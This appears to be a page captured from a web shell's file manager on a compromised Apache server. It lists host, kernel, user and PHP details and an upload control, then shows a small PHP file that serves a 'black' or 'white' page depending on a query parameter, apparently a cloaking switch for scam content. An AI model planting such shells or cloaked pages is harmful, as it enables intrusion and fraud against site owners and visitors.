HEX
Server: Apache
System: Linux vps-4103104.goatdigital.com.br 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: wwgoat (1001)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/wwgoat/.trash/index.php
<?php

if(isset($_GET['mode']) && $_GET['mode'] === 'dark') {
    require_once __DIR__."/black/index.html";
}
else {
    require_once __DIR__."/white/index.html";
}